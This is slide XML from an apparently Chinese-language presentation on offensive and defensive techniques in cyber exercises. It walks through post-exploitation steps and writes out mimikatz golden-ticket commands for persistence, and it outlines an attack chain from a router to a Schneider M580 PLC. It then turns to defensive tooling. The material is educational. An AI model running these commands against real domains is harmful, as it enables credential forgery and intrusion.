              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”行动</a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>概况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0" y="2640132"/>
            <a:ext cx="4197927" cy="26166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7957" y="5972641"/>
            <a:ext cx="828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号称是全球</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>规模最大、辐射范围最广、投入技术最先进的实战化演习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>-- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Locked Shields 2019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27" y="2634951"/>
            <a:ext cx="4462681" cy="2621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后渗透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范例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Step6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>迅速</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>扩张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1400" dirty="0"/>
              <a:t>添加完代理之后，渗透测试主机接入内网，配置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>SMB_Login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>模块批量登录内网</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>机器</a:t>
            </a:r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Step7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>：连接内网隔离服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>3389</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>端口，开启端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>转发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1400" dirty="0" smtClean="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>转发成功，连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>127.0.0.1:5555</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
              <a:t>相当于连接内网的这台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>机器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1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Step8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：添加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>黄金</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>票据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>长期驻留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2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>NTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>票据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FF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2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>aes256</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>票据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN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FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="mar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3440" y="2733283"/>
            <a:ext cx="3740052" cy="7414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42240" y="4667574"/>
            <a:ext cx="890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highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>C:\Users\Administrator\Desktop&gt;mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /krbtgt:NTLM /ticket:test.kirbi" "exit"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
              <a:highlight>
                <a:srgbClr val="C0C0C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2240" y="5637375"/>
            <a:ext cx="872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highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
              </a:rPr>
              <a:t>C:\Users\Administrator\Desktop&gt;mimikatz.exe "kerberos::golden /user:Administrator /domain:域名 /sid:SERVER SID /aes256:值 /ticket:xxx.kirbi" "exit"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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47015" y="986790"/>
            <a:ext cx="8649970" cy="7486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后渗透范例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“天府杯”穿透攻击工控内网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504" y="412937"/>
            <a:ext cx="8372163" cy="57418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攻防关键技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="微信图片_20190129200958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642539"/>
            <a:ext cx="4414059" cy="2579470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2" descr="https://lh5.googleusercontent.com/bZcYEhwrXlS47fZkCYf7QF2ct1yxwXndkFz07RBc6E697JamjooAUFbEw2CGJXDwpGsgTGTS2UwL-Gl2fNR5yoD8gWvOIQ2YfghwnAqdbrv46o2mQHnpemOLbpV2EokDne_aBz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634" y="1115953"/>
            <a:ext cx="5170763" cy="363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微信图片_20190129202845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4221884"/>
            <a:ext cx="4414059" cy="22607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42190" y="5758859"/>
            <a:ext cx="4597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kern="100" dirty="0" smtClean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长亭科技“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0" smtClean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Real </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="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World</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" b="1" kern="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国际</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="100" dirty="0" smtClean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CTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="100" dirty="0" smtClean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kern="100" dirty="0" smtClean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大赛</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="100" dirty="0" smtClean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展示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86023" y="4949623"/>
            <a:ext cx="335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个“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>0 day</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>”漏洞组合攻击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47015" y="1151255"/>
            <a:ext cx="8649970" cy="7486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后渗透案例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>“天府杯”穿透攻击工控内网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504" y="412937"/>
            <a:ext cx="8372163" cy="57418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攻防关键技术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82905" y="2220595"/>
            <a:ext cx="8170545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Step1：局域网用户在手机上安装APP，点击运行APP；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>Step2：APP内嵌代码攻击路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>D-Link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，反弹shell到监听主机；</a:t>
            </a:r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Step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/>
              <a:t>：在D-link上数据嗅探得到用户登陆工控网关——tenda路由器的编码口令；</a:t>
            </a:r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Step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/>
              <a:t>：通过未公开漏洞攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>腾达企业路由器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取Shell；</a:t>
            </a:r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Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，通过腾达企业路由器嗅探到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>施耐德</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Modicon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>型号；</a:t>
            </a:r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Step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/>
              <a:t>，利用施耐德拒绝服务未公开漏洞从tenda路由器上攻击工控设备。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47015" y="1151255"/>
            <a:ext cx="8649970" cy="7486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err="1"/>
              <a:t>Modicon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> M580 PLC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504" y="412937"/>
            <a:ext cx="8372163" cy="574183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攻防关键技术</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://lh3.googleusercontent.com/SOp6Q6zt8xH_nG5Nt8hfOxVF07RnCSwn8Lo4DsQr0u9Zy24lnS5HmL-NmQy2wH0wC-w46dvlF-OuP9cYnnip3hts5fs5-XRulXQRVmKnIHm_vN3HuhAPJOe_WYKiZLYB3FA1mA6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94" y="2414373"/>
            <a:ext cx="248602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guMQt81MxEwPSyakDkDb22sSEV57IjIYqINkEQK47u8_OwJXCTilP6Rlu29wb9ZaGir4w4teEqAe7b3Xd4bwG-KdBgAZ8PRRyhT0kq-je7OfEHJabJZtMyvT9KXoeoMlOFuJQzl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22" y="2270546"/>
            <a:ext cx="25241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03993" y="3035641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攻击前：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807902" y="3133807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攻击后：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1030" name="Picture 6" descr="https://lh6.googleusercontent.com/RmLTISPT_X-Q1MWhpOhYd358gSwYQ74MwziXYihaAFZdEw3H98TBCPyB0G9jW71vWGhiyQxgv-BMy6mKzbs82yXg7UtWwk0qfEUORDNxNu15tS1wEZAfIg-OI9_XlsmCGWAR6v9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49" y="4415939"/>
            <a:ext cx="4214901" cy="234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950753" y="1704662"/>
            <a:ext cx="69900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500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="737373"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>0x20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="737373"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>功能码在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="737373"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>M580 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="737373"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>发现未知漏洞一个</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="11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435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案例小结：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步步为营，逐步推进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扫描、探测、信息收集至关重要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探测、横向、数据回传相互独立，如何关联分析是攻防关键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/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>关键服务器和网络设备的攻防对抗至关重要</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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边界设备（隔离网络的网关、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>DMZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>区域的防火墙、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>等）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域内控制器和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>认证服务器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="20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2000" dirty="0"/>
              <a:t>集中管</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>控软件：安防软件管理服务器、运维平台等均是重点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FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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攻防关键技术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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>通用防护方法及策略</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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 smtClean="0"/>
              <a:t>事前防：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>EDR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 smtClean="0"/>
              <a:t>事中拦：协议、行为分析（数据库保护）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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 smtClean="0"/>
              <a:t>事后审：流量、日志审计（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>SOC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>常见安防设备</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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边界防火墙、应用防护</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>WAF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网络流量分析与安全审计</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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2100" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>流量安全分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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终端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>-EDR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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数据库防护</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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主动式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>蜜罐类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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资产探查与巡检</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty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通用防护方法及挑战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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>挑战：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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各类安防设备联动，事件组合式分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>回溯</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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1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物联网、云计算</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000"/>
              </a:rPr>
              <a:t>网络动态边界</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000"/>
              </a:rPr>
              <a:t>、零</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000"/>
              </a:rPr>
              <a:t>信任</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings" panose="05000000000000000000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100" dirty="0">
              <a:sym typeface="Wingdings" panose="0500000000000000000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2100" dirty="0" err="1"/>
              <a:t>IPSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>等加密会话、隧道保护安全隐私的同时给安全分析带来巨大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>挑战</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0"/>
              <a:t>新挑战要用新技术来解决：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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1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 smtClean="0"/>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>AI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>、大数据，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>尽可能高效、准确地甄别合法用户和攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2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通用防护方法及挑战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 lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>加密流量监测</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="25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2100" b="1" dirty="0" smtClean="0"/>
              <a:t>Gartner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" b="1" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>年，超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>80%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>的企业网络流量将被加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>，加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>的流量中将隐藏超过一半以上的网络恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>软件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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100" dirty="0"/>
              <a:t>三大</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>类恶意流量：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3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恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>代码使用加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>通信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>频繁更换回联域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
              <a:t>IP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zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>利用白站进行中转</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>通信</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>使用“域前置”技术</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="21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加密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>通道中的恶意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>攻击行为</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4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扫描探测</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="21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暴力破解</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="21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zh-CN" altLang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>窃密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非法的或被恶意使用的加密应用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0"/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zh-CN" sz="2100" dirty="0"/>
              <a:t>VPN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2100" dirty="0"/>
              <a:t>合法通道被</a:t>
            </a:r>
            <a:r>
